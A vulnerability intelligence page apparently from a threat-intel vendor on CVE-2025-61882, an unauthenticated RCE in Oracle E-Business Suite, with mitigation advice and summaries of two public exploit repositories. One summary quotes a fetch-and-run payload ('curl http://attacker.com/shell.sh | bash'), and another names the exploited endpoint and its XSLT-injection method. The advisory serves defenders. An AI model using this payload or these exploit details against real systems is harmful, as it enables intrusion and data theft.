Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
CriticalCISA KEVExploited in the wildPublic exploit

Unauthenticated RCE in Oracle E-Business Suite Concurrent Processing BI Publisher Integration

IdentifiersCVE-2025-61882CWE-287· Improper Authentication

CVE-2025-61882 is a critical vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing in Oracle E-Business Suite. Affected versions are 12.2.3 through 12.2.14. Oracle describes the issue as easily exploitable by an unauthenticated attacker with network access over HTTP, and supporting reporting consistently characterizes the outcome as unauthenticated remote code execution or full takeover of the Oracle Concurrent Processing component. The flaw is reachable via HTTP endpoints associated with the BI Publisher Integration functionality and can reportedly be triggered with a crafted request, with no user interaction or prior authentication required. Publicly available content provided here does not include the exact vulnerable function or code path, but multiple sources state the issue enables arbitrary code execution and complete compromise of the affected EBS component.

Share:
For your environment

Are you exposed to this one?

Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.

ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation can result in complete compromise of the affected Oracle Concurrent Processing environment, with high impact to confidentiality, integrity, and availability. An attacker can execute arbitrary code remotely, take control of the vulnerable component, access sensitive enterprise data processed by Oracle E-Business Suite, modify configurations or application state, and disrupt operations. Reporting in the provided content also links exploitation to large-scale data theft and extortion campaigns, indicating practical impact includes exfiltration of financial, HR, and other business data.

Mitigation

If you can’t patch tonight, do this now.

If immediate patching is not possible, restrict network exposure to Oracle E-Business Suite HTTP endpoints associated with Concurrent Processing and BI Publisher Integration, especially from untrusted networks. Limit access through segmentation, reverse proxy or WAF controls, and allowlisting where operationally feasible. Monitor for indicators of compromise and suspicious HTTP requests targeting the exposed EBS endpoints, and review systems for signs of unauthorized code execution or data access. These are temporary risk-reduction measures and do not replace vendor patching.

Remediation

Patch, then assume compromise.

Apply Oracle's emergency/security alert patch for CVE-2025-61882 to affected Oracle E-Business Suite deployments. The provided advisory content indicates affected versions are 12.2.3 through 12.2.14 and recommends upgrading to a fixed state by applying the latest Oracle security alert patch and any required prerequisite patches. Follow Oracle's patch installation guidance and verify all prerequisite updates are installed before deployment.
PUBLIC EXPLOITS

Exploits

2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (9 hidden).

VALID 2 / 11 TOTALView more in app
CVE-2025-61882-Oracle-BI-Publisher-RCEMaturityPoCVerified exploit

Repository contains a small proof-of-concept for unauthenticated remote code execution against Oracle BI Publisher (versions listed in README: 12.2.1.4.0, 12.2.1.3.0) via insecure Java deserialization in an integration component. Structure: - README.md: Describes the affected product/versions and states the issue is RCE via insecure deserialization. - exploit.java: Demonstrates crafting and sending a Java serialized object over a raw TCP socket to host "oracle-server" on port 9704. It hardcodes a command payload ("curl http://attacker.com/shell.sh | bash") and references generating a CommonsBeanutils1 gadget chain via ysoserial, but the actual gadget generation is a placeholder (generatePayload returns null) and the code as written is incomplete (e.g., missing ByteArrayOutputStream import). - exploit.sh: Alternative delivery simulation using curl to POST a serialized payload file (payload.ser) to http://192.168.1.100:9704/xmlpserver with Content-Type: application/java-serialized-object. Capabilities: - Intended capability is network-based delivery of a malicious Java serialized object to trigger deserialization and execute an arbitrary OS command on the target. - Includes a staged command that retrieves and executes a remote script, implying post-exploitation such as a reverse shell. Notable limitations: - Java exploit is not fully functional without implementing gadget generation (ysoserial integration) and fixing missing imports; thus it is best categorized as a POC rather than an operational exploit.

George0PapasotiriouDisclosed Feb 10, 2026javabashnetwork
CVE-2025-61882MaturityPoCVerified exploit

This repository provides a working exploit and scanner for CVE-2025-61882, a critical unauthenticated remote code execution vulnerability in Oracle E-Business Suite (EBS) BI Publisher/template processing (12.2.x series). The exploit leverages a server-side template injection via the '/OA_HTML/configurator/UiServlet' endpoint, allowing an attacker to execute arbitrary system commands on the EBS server without authentication. The repository contains three main Python scripts: - 'scan.py': A non-destructive scanner to probe for the presence of vulnerable endpoints on a target EBS instance. - 'exploit.py': The main exploit script, which interacts with the target, obtains necessary CSRF tokens, and triggers the vulnerability by referencing a malicious XSLT payload hosted on an attacker-controlled server. - 'server.py': A simple HTTP server that serves the malicious XSLT payload. The payload is dynamically generated to execute arbitrary commands (e.g., reverse shell, calc.exe) on the target, using Java reflection and scripting features available in the Oracle EBS Java backend. The exploit is operational and customizable, requiring the attacker to specify the target URL and the address of the attacker's payload server. The attack is performed over HTTP(S) and does not require authentication or user interaction. The README provides detailed usage instructions, legal disclaimers, and defensive recommendations. The code is cleanly separated into scanning, exploitation, and payload hosting components, making it straightforward to use in a test or lab environment. Key fingerprintable endpoints include '/OA_HTML/configurator/UiServlet', '/OA_HTML/runforms.jsp', and '/OA_HTML/JavaScriptServlet' on the target, as well as '/OA_HTML/help/../ieshostedsurvey.xsl' and '/OA_HTML/help/../ibeCRgpIndividualUser.jsp' on the attacker's server.

GhoStZA-debugDisclosed Oct 27, 2025pythonnetwork
EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

VendorProductType
OracleConcurrent Processingapplication

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets are affected, which adversaries are exploiting it right now, which detections to deploy, and what to do tonight.
Exposure mapping

Query your assets running an affected version, and investigate the blast radius.

Threat actor evidence53

Every observed campaign linking this CVE to a named adversary.

Associated malware41

Malware families riding this exploit, with evidence and IOCs.

Detection signatures3

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Vendor-by-vendor mapping

Cross-references every affected SKU, including bundled OEM variants.

Social activity124

Community discussion across Reddit, Mastodon, and other social sources.